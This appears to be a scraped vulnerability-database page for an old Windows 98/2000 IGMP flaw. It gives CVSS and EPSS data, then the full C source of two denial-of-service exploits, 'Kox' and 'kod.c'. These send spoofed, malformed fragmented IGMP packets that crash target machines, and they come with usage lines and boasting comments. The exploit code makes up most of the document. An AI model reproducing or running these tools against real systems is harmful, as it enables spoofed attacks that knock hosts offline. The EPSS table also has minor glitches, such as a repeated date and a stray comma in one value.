CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Improper Input Validation The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
7.8
AV:N/AC:L/Au:N/C:N/I:N/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
21.12%
–
–
2022-04-03
–
–
21.12%
–
–
2023-02-26
–
–
21.12%
–
–
2023-03-12
–
–
–
0.75%
–
2023-07-30
–
–
–
0.75%
–
2024-02-11
–
–
–
0.43%
–
2024-06-02
–
–
–
0.43%
–
2024-07-14
–
–
–
0.43%
–
2024-12-22
–
–
–
0.43%
–
2025-03-09
–
–
–
0.43%
–
2025-01-19
–
–
–
0.43%
–
2025-03-09
–
–
–
0.43%
–
2025-03-18
–
–
–
–
26.91%
2025-03-30
–
–
–
–
34.13%
2025-03-30
–
–
–
–
34.13,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
// source: https://www.securityfocus.com/bid/514/info
The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably tolerate malformed IGMP headers. When one is received, the stack will sometimes fail with unpredictable results ranging from a Blue Screen to instantaneous reboot.
/***
Kox by Coolio (coolio@k-r4d.com)
this was a successful attempt to duplicate klepto/defile's kod win98
exploit and add spoofing support to it. me and defile made this a
race to see who could do spoofing kod first. he won. (mine's better!)
my kox and defile's skod output about the same packets
but he had skod working a few hours before i had kox working.
affected systems: windows 98, windows 98 SE, windows 2000 build 2000
results: bluescreen, tcp/ip stack failure, lockup, or instant reboot
thanks to klepto and defile for making kod, psilord for wanting
to understand what we were doing, greg for telling me about iphdr.ihl,
mancide for letting me use his win98 boxen to test on, and the
few other people i crashed trying to get this working right.
also thanks to the authors of elvis for making such a badass editor.
***/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <string.h>
#include <errno.h>
#include <pwd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/utsname.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/igmp.h>
void usage(char *arg)
{
printf("Kox by Coolio (coolio@k-r4d.com)\n");
printf("Usage: %s <victim>\n", arg);
exit(1);
}
unsigned int randip()
{
struct hostent *he;
struct sockaddr_in sin;
char *buf = (char *)calloc(1, sizeof(char) * 16);
sprintf(buf, "%d.%d.%d.%d",
(random()%191)+23,
(random()%253)+1,
(random()%253)+1,
(random()%253)+1);
inet_aton(buf, (struct in_addr *)&sin);
return sin.sin_addr.s_addr;
}
unsigned short in_cksum(unsigned short *buh, int len)
{
register long sum = 0;
unsigned short oddbyte;
register unsigned short answer;
while(len > 1) {
sum += *buh++;
len -= 2;
}
if(len == 1) {
oddbyte = 0;
*((unsigned char *)&oddbyte) = *(unsigned char *)buh;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xFFFF);
sum += (sum >> 16);
answer = ~sum;
return answer;
}
int nuke_igmp(struct sockaddr_in *victim, unsigned long spoof)
{
int BIGIGMP = 1500;
unsigned char *pkt;
struct iphdr *ip;
struct igmphdr *igmp;
struct utsname *un;
struct passwd *p;
int i, s;
int id = (random() % 40000) + 500;
pkt = (unsigned char *)calloc(1, BIGIGMP);
ip = (struct iphdr *)pkt;
igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr));
ip->version = 4;
ip->ihl = (sizeof *ip) / 4;
ip->ttl = 255;
ip->tot_len = htons(BIGIGMP);
ip->protocol = IPPROTO_IGMP;
ip->id = htons(id);
ip->frag_off = htons(IP_MF);
ip->saddr = spoof;
ip->daddr = victim->sin_addr.s_addr;
ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));
igmp->type = 0;
igmp->group = 0;
igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr));
for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1;
i < BIGIGMP; i++)
pkt[i] = random() % 255;
#ifndef I_GROK
un = (struct utsname *)(pkt + sizeof(struct iphdr) +
sizeof(struct igmphdr) + 40);
uname(un);
p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10);
memcpy(p, getpwuid(getuid()), sizeof(struct passwd));
#endif
if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("error: socket()");
return 1;
}
if(sendto(s, pkt, BIGIGMP, 0, victim,
sizeof(struct sockaddr_in)) == -1) {
perror("error: sendto()");
return 1;
}
usleep(1000000);
for(i = 1; i < 5; i++) {
if(i > 3)
ip->frag_off = htons(((BIGIGMP-20) * i) >> 3);
else
ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF);
sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in));
usleep(2000000);
}
free(pkt);
close(s);
return 0;
}
int main(int argc, char *argv[])
{
struct sockaddr_in victim;
struct hostent *he;
int i;
srandom(time(NULL));
if(argc < 2)
usage(argv[0]);
if((he = gethostbyname(argv[1])) == NULL) {
herror(argv[1]);
exit(1);
}
memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length);
victim.sin_port = htons(0);
victim.sin_family = PF_INET;
printf("IGMP> ");
fflush(stdout);
for(i = 0; i < 10; i++)
{
nuke_igmp(&victim, randip());
printf(".");
fflush(stdout);
}
printf("\n");
fflush(stdout);
}
// source: https://www.securityfocus.com/bid/514/info
The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably tolerate malformed IGMP headers. When one is received, the stack will sometimes fail with unpredictable results ranging from a Blue Screen to instantaneous reboot.
/*
::: kod.c (kiss of death) version 1.2
::: [author] kod.c bug found by klepto /
klepto@levitate.net / rewritten by ignitor / ignitor@EFnet
::: [stuph ] works on bsd/linux/*nix
::: [notes ] bluescreens windows users(98/98se) and kills
tcp stack
::: [m$ bug] windows handles igmp badly and this is the
result
::: [greets]
amputee/nizda/nyt/ignitor/skyline/codelogic/ill`/conio/egotr
ip/TFreak/napster
::: [greets] dist(test monkey)/naz(you rule period.)/#havok/
#irc_addict/#kgb/#eof/everyone
::: [action] ./kod <host> and BEWM!
::: [rant ] there will be lots of rewrites to this.. just
get our name right!
de omnibus dubitandum
*/
/*
windows core dump output (*whee*)
An exception 0E has occurred at 0028:C14C9212 in VxD VIP
(01) +
00006C72. This was called from 0028:C183FF54 in VcD PPPMAC
(04) +
000079BR. It may be possible to continue normally(*not*).
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
struct iphdr
{
unsigned char ihl:4, version:4, tos;
unsigned short tot_len, id, frag_off;
unsigned char ttl, protocol;
unsigned short check;
unsigned int saddr, daddr;
};
struct igmphdr
{
unsigned char type, code;
unsigned short cksum;
struct in_addr group;
};
unsigned short in_chksum(unsigned short *, int);
long resolve(char *);
long resolve(char *host)
{
struct hostent *hst;
long addr;
hst = gethostbyname(host);
if (hst == NULL)
return(-1);
memcpy(&addr, hst->h_addr, hst->h_length);
return(addr);
}
int main(int argc, char *argv[])
{
struct sockaddr_in dst;
struct iphdr *ip;
struct igmphdr *igmp;
long daddr, saddr;
int s, i=0, c, len;
char buf[1500];
if (argc < 3)
{
printf("KOD spoofer by Ignitor and klepto\n");
printf("Usage: %s <src> <dst>\n", *argv);
return(1);
}
daddr = resolve(argv[2]);
saddr = resolve(argv[1]);
memset(buf, 0, 1500);
ip = (struct iphdr *)&buf;
igmp = (struct igmphdr *)&buf[sizeof(struct iphdr)];
dst.sin_addr.s_addr = daddr;
dst.sin_family = AF_INET;
ip->ihl = 5;
ip->version = 4;
ip->tos = 0;
ip->tot_len = htons(10933);
ip->id = htons(48648);
ip->ttl = 64;
ip->protocol = IPPROTO_IGMP;
ip->check = in_chksum((unsigned short *)ip, sizeof(struct
iphdr));
ip->saddr = saddr;
ip->daddr = daddr;
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (s == -1)
return(1);
printf("Sending IGMP packets: %s -> %s\n", argv[1], argv
[2]);
for (c=0;c<2;c++)
{
len = 220;
ip->frag_off = htons(0x73a);
for (i=0;;i++)
{
if (sendto(s,&buf,len,0,(struct sockaddr *)&dst,sizeof
(struct sockaddr_in)) == -1)
{
perror("Error sending packet");
exit(-1);
}
if (ntohs(ip->frag_off) == 0x2000)
break;
len = 1500;
if (!i)
ip->frag_off = htons(0x2681);
else
ip->frag_off = htons(ntohs(ip->frag_off) - 185);
ip->check = in_chksum((unsigned short *)ip, sizeof
(struct iphdr));
}
}
return(1);
}
unsigned short in_chksum(unsigned short *addr, int len)
{
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)addr;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}